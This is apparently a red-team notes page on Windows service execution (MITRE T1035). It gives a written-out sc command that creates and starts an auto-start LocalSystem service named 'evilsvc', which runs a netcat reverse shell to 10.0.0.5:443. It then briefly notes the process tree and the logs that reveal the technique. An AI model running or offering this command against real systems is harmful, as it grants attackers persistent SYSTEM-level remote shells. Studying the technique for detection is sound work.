Skip to content

Latest commit

 

History

History
34 lines (21 loc) · 771 Bytes

File metadata and controls

34 lines (21 loc) · 771 Bytes
description
Code Execution, Privilege Escalation

Service Execution

Execution

Creating an evil service with a netcat reverse shell:

{% code title="attacker@victim" %}

C:\> sc create evilsvc binpath= "c:\tools\nc 10.0.0.5 443 -e cmd.exe" start= "auto" obj= "LocalSystem" password= ""
[SC] CreateService SUCCESS
C:\> sc start evilsvc

{% endcode %}

Observations

The reverse shell lives under services.exe as expected:

Windows security, application, Service Control Manager and sysmon logs provide some juicy details:

References

{% embed url="https://attack.mitre.org/wiki/Technique/T1035" %}